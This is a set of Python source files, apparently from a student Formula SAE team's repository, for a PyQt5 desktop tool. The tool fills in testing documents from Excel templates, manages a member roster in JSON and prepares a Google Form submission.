setupUi(self, attendee_list):\n attendee_list.setObjectName(\"attendee_list\")\n attendee_list.resize(648, 314)\n attendee_list.setMinimumSize(QtCore.QSize(648, 314))\n attendee_list.setMaximumSize(QtCore.QSize(1107, 314))\n attendee_list.setSizeGripEnabled(True)\n self.gridLayout = QtWidgets.QGridLayout(attendee_list)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.tree_attendee = QtWidgets.QTreeWidget(attendee_list)\n self.tree_attendee.setMinimumSize(QtCore.QSize(510, 238))\n self.tree_attendee.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContents)\n self.tree_attendee.setEditTriggers(QtWidgets.QAbstractItemView.EditKeyPressed)\n self.tree_attendee.setAlternatingRowColors(True)\n self.tree_attendee.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)\n self.tree_attendee.setUniformRowHeights(False)\n self.tree_attendee.setHeaderHidden(False)\n self.tree_attendee.setObjectName(\"tree_attendee\")\n self.tree_attendee.header().setCascadingSectionResizes(True)\n self.tree_attendee.header().setHighlightSections(False)\n self.gridLayout.addWidget(self.tree_attendee, 1, 0, 1, 1)\n self.label_attendee_list = QtWidgets.QLabel(attendee_list)\n font = QtGui.QFont()\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.label_attendee_list.setFont(font)\n self.label_attendee_list.setObjectName(\"label_attendee_list\")\n self.gridLayout.addWidget(self.label_attendee_list, 0, 0, 1, 1)\n self.verticalLayout = QtWidgets.QVBoxLayout()\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.btn_modify_member = QtWidgets.QPushButton(attendee_list)\n self.btn_modify_member.setMaximumSize(QtCore.QSize(110, 16777215))\n self.btn_modify_member.setObjectName(\"btn_modify_member\")\n self.verticalLayout.addWidget(self.btn_modify_member)\n self.btn_add_member = QtWidgets.QPushButton(attendee_list)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_add_member.sizePolicy().hasHeightForWidth())\n self.btn_add_member.setSizePolicy(sizePolicy)\n self.btn_add_member.setMinimumSize(QtCore.QSize(110, 23))\n self.btn_add_member.setMaximumSize(QtCore.QSize(110, 16777215))\n self.btn_add_member.setObjectName(\"btn_add_member\")\n self.verticalLayout.addWidget(self.btn_add_member)\n self.btn_remove_member = QtWidgets.QPushButton(attendee_list)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_remove_member.sizePolicy().hasHeightForWidth())\n self.btn_remove_member.setSizePolicy(sizePolicy)\n self.btn_remove_member.setMaximumSize(QtCore.QSize(110, 16777215))\n self.btn_remove_member.setObjectName(\"btn_remove_member\")\n self.verticalLayout.addWidget(self.btn_remove_member)\n spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.verticalLayout.addItem(spacerItem)\n self.gridLayout.addLayout(self.verticalLayout, 1, 1, 1, 1)\n self.buttonBox = QtWidgets.QDialogButtonBox(attendee_list)\n self.buttonBox.setMaximumSize(QtCore.QSize(114, 23))\n self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Save)\n self.buttonBox.setCenterButtons(False)\n self.buttonBox.setObjectName(\"buttonBox\")\n self.gridLayout.addWidget(self.buttonBox, 2, 1, 1, 1)\n\n self.retranslateUi(attendee_list)\n QtCore.QMetaObject.connectSlotsByName(attendee_list)\n\n def retranslateUi(self, attendee_list):\n _translate = QtCore.QCoreApplication.translate\n attendee_list.setWindowTitle(_translate(\"attendee_list\", \"Attendee List\"))\n self.tree_attendee.setSortingEnabled(True)\n self.tree_attendee.headerItem().setText(0, _translate(\"attendee_list\", \"First Name\"))\n self.tree_attendee.headerItem().setText(1, _translate(\"attendee_list\", \"Last Name\"))\n self.tree_attendee.headerItem().setText(2, _translate(\"attendee_list\", \"Cell #\"))\n self.tree_attendee.headerItem().setText(3, _translate(\"attendee_list\", \"Waiver Signed\"))\n self.tree_attendee.headerItem().setText(4, _translate(\"attendee_list\", \"Roles\"))\n self.label_attendee_list.setText(_translate(\"attendee_list\", \"Attendee List:\"))\n self.btn_modify_member.setText(_translate(\"attendee_list\", \"Modify Member\"))\n self.btn_add_member.setText(_translate(\"attendee_list\", \"Add Member\"))\n self.btn_remove_member.setText(_translate(\"attendee_list\", \"Remove Member(s)\"))\n\n" }, { "alpha_fraction": 0.5588667988777161, "alphanum_fraction": 0.5676240921020508, "avg_line_length": 40.63673400878906, "blob_id": "ea0bc9f53cf67da696901af514f0de0f7529e2ba", "content_id": "3027dfcb31afce8f7b22cd21c6e428e11f1839b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30603, "license_type": "no_license", "max_line_length": 161, "num_lines": 735, "path": "/main.py", "repo_name": "concordia-fsae/testing_doc_maker", "src_encoding": "UTF-8", "text": "'''Testing Doc Maker program, used to help speed up making testing docs for FSAE testing sessions'''\n\nimport sys\nfrom functools import partial\nimport json\nimport requests\n\nfrom PyQt5.QtCore import QRegExp, QDate, QTime\nfrom PyQt5.QtGui import QRegExpValidator\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QDialog\nfrom PyQt5.QtWidgets import QFileDialog, QMessageBox, QTreeWidgetItem\nfrom openpyxl import load_workbook\nfrom windows.homepage import Ui_MainWindow\nfrom windows.attendee import Ui_attendee_list\nfrom windows.member import Ui_member_mod\n\n\n### Form Response Vars\n\nFORM_ID = \"1FAIpQLSe1iCukrB_HYS1Dvl8rjtazTZyAza1ArFZ-d3HaE-5gXTyWKA\"\nFORM_RESP_URL = \"https://docs.google.com/forms/u/2/d/e/\" + FORM_ID + \"/formResponse\"\n\n\n### PyQT Section\n\nclass AppWindow(QMainWindow):\n '''Program Main Window'''\n def __init__(self):\n super(AppWindow, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.attendee = AttendeeWindow(self)\n self.member = MemberWindow(self)\n\n # set date to today's date, and adjust minimum difference between start time and end time\n today = QDate.currentDate()\n self.ui.date_session.setDate(today)\n self.ui.date_session.setMinimumDate(today)\n self.ui.time_start.editingFinished.connect(self.min_end_time)\n\n # adjust initial visibility of labels\n self.ui.label_save_doc.setVisible(False)\n self.ui.label_create_roster.setVisible(False)\n self.ui.label_roster.setVisible(False)\n\n # map buttons to functions\n self.ui.btn_save_doc.clicked.connect(self.save_testing_doc_dialog)\n self.ui.btn_open_template.clicked.connect(self.open_testing_doc_dialog)\n self.ui.btn_submit_form.clicked.connect(self.submit_form)\n self.ui.btn_export.clicked.connect(self.export_general)\n self.ui.btn_import.clicked.connect(self.import_general)\n self.ui.btn_open_roster.clicked.connect(self.open_roster_dialog)\n self.ui.btn_create_roster.clicked.connect(self.create_roster_dialog)\n self.ui.btn_save_roster.clicked.connect(self.save_roster)\n self.ui.btn_close_roster.clicked.connect(self.close_roster)\n self.ui.btn_modify_attending.clicked.connect(self.open_attendee)\n self.ui.btn_add_member.clicked.connect(partial(self.member_window, \"add\"))\n self.ui.btn_modify_member.clicked.connect(partial(self.member_window, \"modify\"))\n self.ui.btn_remove_member.clicked.connect(self.remove_member)\n\n # map actions in roster to functions\n self.ui.tree_roster.itemActivated.connect(partial(self.member_window, \"modify\"))\n self.ui.tree_roster.itemSelectionChanged.connect(self.member_selected)\n self.ui.tree_roster.sortByColumn(0, 0)\n\n # map menubar actions to functions\n self.ui.actionOpen_Template_File.triggered.connect(self.open_testing_doc_dialog)\n self.ui.actionSave_Testing_Doc.triggered.connect(self.save_testing_doc_dialog)\n\n # define vars reltaed to loading files\n self.roster_file_path = None\n self.roster = {}\n self.doc_template_path = self.doc_template = self.pc01 = None\n self.pc02 = self.pc08 = None\n\n # define list of radio button groups, and link actions to functions\n self.radios = [self.ui.radio_type, self.ui.radio_loc]\n self.ui.radio_type.buttonClicked.connect(partial(self.process_radio_input))\n self.ui.radio_loc.buttonClicked.connect(partial(self.process_radio_input))\n\n # define lists of field categories\n self.alpha_fields = [self.ui.edit_requestor, self.ui.edit_lead, \\\n self.ui.edit_type_other, self.ui.edit_cat]\n self.alphanum_fields = [self.ui.edit_part, self.ui.edit_loc_other]\n self.num_fields = [self.ui.edit_doc_num]\n self.fields = self.alpha_fields + self.alphanum_fields + self.num_fields\n\n # link field focus events to the functions that process the data in them\n for field in self.fields:\n field.focusOutEvent = partial(self.process_input, field)\n field.focusInEvent = partial(self.reset_color, field)\n\n # assign regex to the alpha fields\n for field in self.alpha_fields:\n field.setValidator(QRegExpValidator(QRegExp(\"[a-zA-Z\\\\s]*\")))\n\n # assign regex to the alphanumeric fields\n for field in self.alphanum_fields:\n field.setValidator(QRegExpValidator(QRegExp(\"[a-zA-Z\\\\s\\\\d]*\")))\n\n # assign regex to the doc num field\n self.ui.edit_doc_num.setValidator(QRegExpValidator(QRegExp(\"[\\\\d]{5}\")))\n\n # show the main window\n self.show()\n\n\n def open_testing_doc_dialog(self):\n '''Start the \"open file\" dialog for selecting the testing doc template'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getOpenFileName(self, \"Select Template File\", \\\n \"\", \"Excel Files (*.xlsx);;All Files (*)\", options=options)\n if file_name:\n try:\n self.doc_template_path = file_name\n self.doc_template = load_workbook(filename=self.doc_template_path)\n self.pc01 = self.doc_template['General Information']\n self.pc02 = self.doc_template['PC02 - Safety']\n self.pc08 = self.doc_template['PC08 - Personnel List']\n self.ui.file_path.setText(self.doc_template_path)\n\n except KeyError:\n QMessageBox.critical(self, \"Error in file\", \\\n \"The required sheets were not found in this file.\\n\"\\\n \"Check that this file matches the template.\")\n\n except IOError:\n QMessageBox.critical(self, \"Unable to open file\", \\\n \"There was an error opening \\\"%s\\\"\" % file_name)\n self.ui.label_roster.setText(\"Error opening file\")\n\n\n def save_testing_doc_dialog(self):\n '''Start the \"save file\" dialog for saving the completed testing doc'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getSaveFileName(self, \"Save Testing Doc\", \\\n \"\", \"Excel File (*.xlsx);;All Files (*)\", options=options)\n if file_name:\n pass\n # TODO save the testing doc\n\n\n def open_roster_dialog(self):\n '''Start the \"open file\" dialog for selecting the roster file'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getOpenFileName(self, \"Select Roster File\", \\\n \"\", \"JSON Files (*.json)\", options=options)\n if file_name:\n self.roster_file_path = file_name\n try:\n with open(self.roster_file_path, \"r\") as roster:\n\n try:\n self.roster = json.load(roster)\n except json.decoder.JSONDecodeError:\n pass\n\n if self.roster and not self.roster == {}:\n for member in self.roster:\n mem = self.roster[member]\n item = QTreeWidgetItem(\n [\n member, \\\n mem[\"first_name\"], \\\n mem[\"last_name\"], \\\n mem[\"cell_num\"] \\\n ])\n item.setCheckState(4, mem[\"waiver\"])\n item.setCheckState(5, mem[\"truck\"])\n item.setCheckState(6, mem[\"trailer\"])\n self.ui.tree_roster.addTopLevelItem(item)\n else:\n QMessageBox.information(self, \"Empty Roster\", \\\n \"Roster file contains no members\")\n\n ui = self.ui\n ui.label_roster.setText(self.roster_file_path)\n ui.label_roster.setVisible(True)\n ui.btn_open_roster.setText(\"Roster File Opened\")\n ui.btn_open_roster.setEnabled(False)\n ui.btn_create_roster.setEnabled(False)\n ui.btn_close_roster.setEnabled(True)\n ui.btn_save_roster.setEnabled(True)\n ui.btn_add_member.setEnabled(True)\n\n except TypeError:\n QMessageBox.critical(self, \"Improperly Formatted File\", \\\n \"The selected JSON file \" \\\n \"is corrupt or improperly formatted.\")\n\n except IOError:\n QMessageBox.critical(self, \"Unable to open file\", \\\n \"There was an error opening \\\"%s\\\"\" % file_name)\n self.ui.label_roster.setText(\"Error opening file\")\n\n\n def create_roster_dialog(self):\n '''Start the \"save file\" dialog for saving the roster'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getSaveFileName(self, \"Create Roster File\", \\\n \"\", \"JSON File (*.json)\", options=options)\n if file_name:\n if not \".json\" in file_name.lower():\n file_name += \".json\"\n\n try:\n with open(file_name, \"w+\"):\n self.ui.label_roster.setText(self.roster_file_path)\n self.ui.label_roster.setVisible(True)\n self.ui.btn_open_roster.setText(\"Roster File Opened\")\n self.ui.btn_open_roster.setEnabled(False)\n self.ui.btn_create_roster.setEnabled(False)\n self.ui.btn_close_roster.setEnabled(True)\n self.ui.btn_save_roster.setEnabled(True)\n self.ui.btn_add_member.setEnabled(True)\n\n self.update_json()\n except IOError:\n QMessageBox.critical(self, \"Unable to open file\", \\\n \"There was an error opening \\\"%s\\\"\" % file_name)\n self.ui.label_create_roster.setText(\"Error creating Roster File\")\n\n\n def export_general_dialog(self):\n '''Start the \"save file\" dialog for saving the General Info template file'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getSaveFileName(self, \"Save General Info\", \\\n \"\", \"JSON File (*.json)\", options=options)\n if file_name:\n if not \".json\" in file_name.lower():\n file_name += \".json\"\n self.ui.btn_export.setEnabled(False)\n return file_name\n\n\n def import_general_dialog(self):\n '''Start the \"open file\" dialog for selecting a General Info JSON file'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getOpenFileName(self, \"Select Template File\", \\\n \"\", \"JSON Files (*.json)\", options=options)\n if file_name:\n try:\n with open(file_name, \"r\") as template_file:\n return json.load(template_file)\n except IOError:\n QMessageBox.critical(self, \"Couldn't open file\", \\\n \"Couldn't open %s file for reading\", file_name)\n else:\n return None\n\n\n def export_general(self):\n '''Export all the information from the General Info page\n for later re-importing'''\n if self.validate_input():\n return\n path = self.export_general_dialog()\n if path is None:\n return\n\n export = {}\n export[\"requestor\"] = self.ui.edit_requestor.text()\n export[\"lead\"] = self.ui.edit_lead.text()\n export[\"date\"] = self.ui.date_session.date().toString()\n export[\"start_time\"] = self.ui.time_start.time().toString()\n export[\"end_time\"] = self.ui.time_end.time().toString()\n export[\"type\"] = self.ui.radio_type.checkedButton().text()\n export[\"type_other\"] = self.ui.radio_type_other.text()\n export[\"loc\"] = self.ui.radio_loc.checkedButton().text()\n export[\"loc_other\"] = self.ui.radio_loc_other.text()\n export[\"part\"] = self.ui.edit_part.text()\n export[\"cat\"] = self.ui.edit_cat.text()\n export[\"doc_num\"] = self.ui.edit_doc_num.text()\n export[\"desc\"] = self.ui.edit_desc.toPlainText()\n\n try:\n with open(path, \"w+\") as export_file:\n json.dump(export, export_file)\n except IOError:\n QMessageBox.critical(self, \"Unable to write file\", \\\n \"There was an error writing \\\"%s\\\"\" % path)\n\n\n def import_general(self):\n '''Import all the information on the General Info page from\n a JSON file'''\n\n\n general = self.import_general_dialog()\n if general is None:\n return\n\n try:\n self.ui.edit_requestor.setText(general[\"requestor\"])\n self.ui.edit_lead.setText(general[\"lead\"])\n self.ui.date_session.setDate(QDate().fromString(general[\"date\"]))\n self.ui.time_start.setTime(QTime().fromString(general[\"start_time\"]))\n self.ui.time_end.setTime(QTime().fromString(general[\"end_time\"]))\n self.ui.radio_type_other.setText(general[\"type_other\"])\n self.ui.radio_loc_other.setText(general[\"loc_other\"])\n self.ui.edit_part.setText(general[\"part\"])\n self.ui.edit_cat.setText(general[\"cat\"])\n self.ui.edit_doc_num.setText(general[\"doc_num\"])\n self.ui.edit_desc.setText(general[\"desc\"])\n\n if general[\"type\"] == \"Dyno\":\n self.ui.radio_dyno.setChecked(True)\n elif general[\"type\"] == \"Track\":\n self.ui.radio_track.setChecked(True)\n else:\n self.ui.radio_loc_other.setChecked(True)\n\n if general[\"loc\"] == \"Cage\":\n self.ui.radio_loc_cage.setChecked(True)\n elif general[\"loc\"] == \"Loading Dock\":\n self.ui.radio_loc_loading.setChecked(True)\n elif general[\"loc\"] == \"Casino\":\n self.ui.radio_loc_casino.setChecked(True)\n\n except KeyError:\n QMessageBox.critical(self, \"Improperly Formatted File\", \\\n \"The selected JSON file is corrupt or improperly formatted.\")\n\n self.validate_input()\n\n\n def save_roster(self):\n '''Save the roster file to disk'''\n self.update_json()\n\n with open(self.roster_file_path, \"w\") as roster:\n json.dump(self.roster, roster)\n\n self.ui.btn_save_roster.setEnabled(False)\n\n\n def update_json(self):\n '''Update the json var containing the roster'''\n self.roster = {}\n for item in range(0, self.ui.tree_roster.topLevelItemCount()):\n member = self.ui.tree_roster.topLevelItem(item)\n self.roster[member.text(0)] = {\"first_name\":member.text(1), \\\n \"last_name\":member.text(2), \\\n \"cell_num\":member.text(3), \\\n \"waiver\":member.checkState(4), \\\n \"truck\":member.checkState(5), \\\n \"trailer\":member.checkState(6)}\n\n\n def close_roster(self):\n '''Close the Roster File'''\n\n confirm = QMessageBox.warning(self, \"Closing Roster File\", \\\n \"Are you sure you want to close the Roster File?\\nAny usaved changes will be lost.\", \\\n QMessageBox.Yes, QMessageBox.No)\n\n if confirm != 16384:\n return\n\n self.ui.btn_open_roster.setEnabled(True)\n self.ui.btn_open_roster.setText(\"Open Roster File\")\n self.ui.btn_create_roster.setEnabled(True)\n self.ui.label_roster.setVisible(False)\n\n for member in [self.ui.btn_close_roster, self.ui.btn_save_roster, \\\n self.ui.btn_add_member, self.ui.btn_modify_member, self.ui.btn_remove_member]:\n member.setEnabled(False)\n\n self.ui.tree_roster.clear()\n\n\n def member_window(self, purpose):\n '''Open the member add/modify window'''\n if purpose == \"add\":\n self.member.setWindowTitle(\"New Member\")\n self.member.ui.buttonBox.accepted.connect(self.save_member)\n self.member.ui.buttonBox.rejected.connect(self.add_cancel)\n self.member.show()\n elif purpose == \"modify\":\n tree = self.ui.tree_roster\n m = self.member.ui\n if len(tree.selectedItems()) == 1:\n selected = tree.selectedItems()[0]\n\n members = [m.edit_id, m.edit_first_name, m.edit_last_name, m.edit_number]\n for ind in enumerate(members):\n ind[1].setText(selected.text(ind[0]))\n\n for ind in enumerate([m.check_waiver, m.check_truck, m.check_trailer]):\n ind[1].setCheckState(selected.checkState(ind[0]+4))\n ind[1].setTristate(False)\n\n self.member.setWindowTitle(\"Modify Member\")\n m.buttonBox.accepted.connect(partial(self.save_member, selected))\n self.member.ui.buttonBox.rejected.connect(self.add_cancel)\n\n\n selected = tree.selectedItems()\n for member in [m.edit_id, m.edit_first_name, m.edit_last_name, m.edit_number]:\n member.setDisabled(False)\n\n for member in [m.check_waiver, m.check_truck, m.check_trailer]:\n member.setTristate(False)\n\n self.member.show()\n else:\n selected = tree.selectedItems()\n for member in [m.edit_id, m.edit_first_name, m.edit_last_name, m.edit_number]:\n member.setDisabled(True)\n\n for member in [m.check_waiver, m.check_truck, m.check_trailer]:\n member.setTristate(True)\n member.setCheckState(1)\n\n self.member.setWindowTitle(\"Modify Members\")\n m.buttonBox.accepted.connect(partial(self.save_member, selected))\n self.member.ui.buttonBox.rejected.connect(self.add_cancel)\n\n self.member.show()\n\n\n\n # def add_member(self):\n # '''Add a member to the roster'''\n # tree = self.ui.tree_roster\n # m = self.member.ui\n # complete = True\n # duplicate = False\n\n # e_mn = m.edit_id.text()\n # e_fn = m.edit_first_name.text()\n # e_ln = m.edit_last_name.text()\n # e_cn = m.edit_number.text()\n # c_w = m.check_waiver.isChecked()\n # c_tu = m.check_truck.isChecked()\n # c_tl = m.check_trailer.isChecked()\n # valid = [m.edit_id.hasAcceptableInput(), m.edit_number.hasAcceptableInput()]\n\n # if any(k in self.roster for k in (e_mn, e_cn)):\n # complete = False\n # duplicate = True\n\n # if not (valid[0] and valid[1]):\n # complete = False\n # QMessageBox.information(self, \"Value Error\", \\\n # \"Member ID or Phone Number is invalid.\")\n\n # if duplicate:\n # QMessageBox.information(self, \"Duplicate Found\", \\\n # \"Duplicate information found. Please double check all data.\")\n\n # if complete:\n # item = QTreeWidgetItem([e_mn, e_fn, e_ln, e_cn])\n # for check in enumerate([c_w, c_tu, c_tl]):\n # state = 2 if check[1] else 0\n # item.setCheckState(check[0]+4, state)\n\n # tree.addTopLevelItem(item)\n # self.update_json()\n # self.member.close()\n # self.member = MemberWindow(self)\n\n\n def save_member(self, member=\"\"):\n '''Save the member(s) that was/were modified'''\n m = self.member.ui\n if not isinstance(member, list):\n complete = True\n duplicate = False\n\n edits = [m.edit_id.text(), m.edit_first_name.text(), \\\n m.edit_last_name.text(), m.edit_number.text()]\n checks = [m.check_waiver.isChecked(), m.check_truck.isChecked(), \\\n m.check_trailer.isChecked()]\n\n valid = [m.edit_id.hasAcceptableInput(), m.edit_number.hasAcceptableInput()]\n\n if not isinstance(member, str):\n curr = self.roster.pop(edits[0])\n\n if any(k in self.roster for k in (edits[0], edits[1])):\n complete = False\n duplicate = True\n\n if not (valid[0] and valid[1]):\n complete = False\n QMessageBox.information(self, \"Value Error\", \\\n \"Member ID or Phone Number is invalid.\")\n\n if duplicate:\n QMessageBox.information(self, \"Duplicate Found\", \\\n \"Duplicate information found. Please double check all data.\")\n\n if complete:\n if isinstance(member, str):\n member = QTreeWidgetItem(edits)\n self.ui.tree_roster.addTopLevelItem(member)\n\n else:\n for data in enumerate(edits):\n member.setText(data[0], data[1])\n\n for check in enumerate(checks):\n state = 2 if check[1] else 0\n member.setCheckState(check[0]+4, state)\n\n\n self.update_json()\n self.member.close()\n self.member = MemberWindow(self)\n elif len(member) > 1:\n checks = [m.check_waiver.checkState(), m.check_truck.checkState(), \\\n m.check_trailer.checkState()]\n if any(k != 1 for k in checks):\n for mem in member:\n if checks[0] != 1:\n mem.setCheckState(4, checks[0])\n if checks[1] != 1:\n mem.setCheckState(5, checks[1])\n if checks[2] != 1:\n mem.setCheckState(6, checks[2])\n self.update_json()\n self.member.close()\n self.member = MemberWindow(self)\n\n\n def member_selected(self, dis=\"\"):\n '''Runs when the selection in the tree is changed'''\n if self.ui.tree_roster.selectedItems():\n self.ui.btn_modify_member.setEnabled(True)\n self.ui.btn_remove_member.setEnabled(True)\n else:\n self.ui.btn_modify_member.setEnabled(False)\n self.ui.btn_remove_member.setEnabled(False)\n\n self.ui.btn_save_roster.setEnabled(True)\n\n if len(self.ui.tree_roster.selectedItems()) > 1:\n self.ui.btn_modify_member.setText(\"Modify Members\")\n else:\n self.ui.btn_modify_member.setText(\"Modify Member\")\n\n\n def remove_member(self):\n '''Remove a member from the attendee list'''\n tree = self.ui.tree_roster\n for member in tree.selectedItems():\n tree.takeTopLevelItem(tree.indexOfTopLevelItem(member))\n self.update_json()\n\n\n def add_cancel(self):\n '''Action on cancelling member addition'''\n confirm = QMessageBox.warning(self, \"Unsaved Changes\", \\\n \"Are you sure you want to cancel?\", QMessageBox.Yes, QMessageBox.No)\n\n if confirm == 16384:\n self.member.close()\n self.member = MemberWindow(self)\n\n\n def process_radio_input(self, field=\"\"):\n '''Process the radio input'''\n self.ui.edit_loc_other.setEnabled(self.ui.radio_loc_other.isChecked())\n self.ui.edit_type_other.setEnabled(self.ui.radio_type_other.isChecked())\n\n if not self.ui.edit_type_other.isEnabled():\n self.ui.edit_type_other.setStyleSheet(\"\")\n\n if not self.ui.edit_loc_other.isEnabled():\n self.ui.edit_loc_other.setStyleSheet(\"\")\n\n for radio in self.radios:\n if radio.checkedButton() is None:\n for button in radio.buttons():\n button.setStyleSheet(\"background-color: rgb(255, 143, 145);\")\n else:\n for button in radio.buttons():\n button.setStyleSheet(\"\")\n\n self.ui.btn_save_doc.setEnabled(True)\n\n\n def process_input(self, field, dis):\n '''Process the user input when they finish editing the given'''\n if(field.text() == \"\" or field.text() == \" \"):\n field.setStyleSheet(\"background-color: rgb(255, 143, 145);\")\n else:\n field.setStyleSheet(\"\")\n\n self.ui.btn_save_doc.setEnabled(True)\n\n\n def reset_color(self, field, dis):\n '''Helper to reset the color of the given field'''\n field.setStyleSheet(\"\")\n\n\n def validate_input(self):\n '''Validate the information that the user has entered'''\n complete = True\n ### validate text entry fields\n for field in self.alpha_fields + self.alphanum_fields + [self.ui.edit_doc_num]:\n if(field.isEnabled() and (field.text() == \"\" \\\n or field.text() == \" \" \\\n or not field.hasAcceptableInput())):\n\n complete = False\n field.setStyleSheet(\"background-color: rgb(255, 143, 145);\")\n else:\n field.setStyleSheet(\"\")\n\n ### validate radio buttons\n for radio in self.radios:\n if radio.checkedButton() is None:\n for button in radio.buttons():\n button.setStyleSheet(\"background-color: rgb(255, 143, 145);\")\n\n self.process_radio_input()\n\n if complete:\n return 0\n\n return 1\n\n\n def submit_form(self):\n '''Submit the Google Form'''\n if self.validate_input():\n return\n other_type_resp = other_loc_resp = \"\"\n other_type = self.ui.radio_type.checkedButton().text()\n other_loc = self.ui.radio_loc.checkedButton().text()\n\n if self.ui.radio_type_other.isEnabled():\n other_type_resp = self.ui.edit_type_other.text()\n other_type = \"__other_option__\"\n elif self.ui.radio_loc_other.isEnabled():\n other_loc_resp = self.ui.edit_loc_other.text()\n other_loc = \"__other_option__\"\n\n submission = {\"entry.1000008\":\"Aero\", # team\n \"entry.1000011\":self.ui.edit_requestor.text(), # person submitting form\n \"entry.1000013_month\":self.ui.date_session.date().month(), # test session month\n \"entry.1000013_day\":self.ui.date_session.date().day(), # test session day\n \"entry.1000013_year\":self.ui.date_session.date().year(), # test session year\n \"entry.1000014_hour\":self.ui.time_start.time().hour(), # start time hour\n \"entry.1000014_minute\":self.ui.time_start.time().minute(), # start time minute\n \"entry.1000015_hour\":self.ui.time_end.time().hour(), # end time hour\n \"entry.1000015_minute\":self.ui.time_end.time().minute(), # end time minute\n \"entry.1000003.other_option_response\":other_type_resp, # set to self.ui.edit_type_other.text() if self.ui.radio_type_other.isEnabled()\n \"entry.1000003\":other_type, # set to the selected type radio button text\n \"entry.1000009.other_option_response\":other_loc_resp, # set to self.ui.edit_loc_other.text() if self.ui.radio_loc_other.isEnabled()\n \"entry.1000009\":other_loc, # set to the selected location radio button text\n \"entry.1000006\":self.ui.edit_lead.text(), # test lead\n \"entry.1000007\":\"attending\", # list of other members attending\n \"entry.1450814088\":self.ui.edit_doc_num, # testing doc number\n \"entry.1000010\":\"\"} # additional info\n #requests.post(form_resp_url, submission)\n\n\n def min_end_time(self):\n '''Set the minimum end time when the start time changes'''\n min_end = self.ui.time_start.time()\n if self.ui.time_end.time().hour() < self.ui.time_start.time().hour() + 1:\n min_end.setHMS(min_end.hour() + 1, min_end.minute(), min_end.second())\n self.ui.time_end.setMinimumTime(min_end)\n\n\n def open_attendee(self):\n '''Open the attendee list window'''\n if self.ui.btn_close_roster.isEnabled():\n self.attendee.show()\n else:\n QMessageBox.information(self, \"Roster Not Open\", \\\n \"Please open a Roster first by going to the \\\"Roster Management\\\" tab.\", )\n\nclass AttendeeWindow(QDialog):\n '''Attendee list dialog'''\n def __init__(self, parent):\n super(AttendeeWindow, self).__init__(parent)\n self.ui = Ui_attendee_list()\n self.ui.setupUi(self)\n\n self.ui.btn_add_member.clicked.connect(self.add_member)\n self.ui.btn_remove_member.clicked.connect(self.remove_member)\n self.ui.tree_attendee.clicked.connect(self.member_selected)\n\n\n def add_member(self):\n '''Add a member to the attendee list'''\n pass\n\n\n def member_selected(self):\n '''Runs when the selection in the tree is changed'''\n if len(self.ui.tree_attendee.selectedItems()) > 1:\n self.ui.btn_modify_member.setText(\"Modify Members\")\n else:\n self.ui.btn_modify_member.setText(\"Modify Member\")\n\n\n def remove_member(self):\n '''Remove a member from the attendee list'''\n tree = self.ui.tree_attendee\n for member in tree.selectedItems():\n tree.takeTopLevelItem(tree.indexOfTopLevelItem(member))\n\n\nclass MemberWindow(QDialog):\n '''Member add/modify dialog'''\n def __init__(self, parent):\n super(MemberWindow, self).__init__(parent)\n self.ui = Ui_member_mod()\n self.ui.setupUi(self)\n\n self.ui.edit_id.setValidator(QRegExpValidator(QRegExp(\"[\\\\d]{3}\")))\n self.ui.edit_first_name.setValidator(QRegExpValidator(QRegExp(\"[a-zA-Z\\\\s]*\")))\n self.ui.edit_last_name.setValidator(QRegExpValidator(QRegExp(\"[a-zA-Z\\\\s]*\")))\n self.ui.edit_number.setValidator(QRegExpValidator(QRegExp( \\\n \"^((\\\\+?(\\\\d{2}))\\\\s?)?((\\\\d{2})|(\\\\((\\\\d{2})\\\\))\\\\s?)?(\\\\d{3,15})(\\\\-(\\\\d{3,15}))?$\")))\n\n\n\nif __name__ == '__main__':\n APP = QApplication(sys.argv)\n W = AppWindow()\n W.show()\n sys.exit(APP.exec_())\n" }, { "alpha_fraction": 0.6890565752983093, "alphanum_fraction": 0.702641487121582, "avg_line_length": 54.97887420654297, "blob_id": "5b955a6c2e6cc623d7d08b94eec563636ea14564", "content_id": "6f25ad7ac71b3476b234e44e5d2085656f0157c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7950, "license_type": "no_license", "max_line_length": 108, "num_lines": 142, "path": "/windows/member.py", "repo_name": "concordia-fsae/testing_doc_maker", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file '.\\windows\\member_export.ui'\n#\n# Created by: PyQt5 UI code generator 5.11.3\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_member_mod(object):\n def setupUi(self, member_mod):\n member_mod.setObjectName(\"member_mod\")\n member_mod.resize(219, 213)\n self.gridLayout = QtWidgets.QGridLayout(member_mod)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.formLayout = 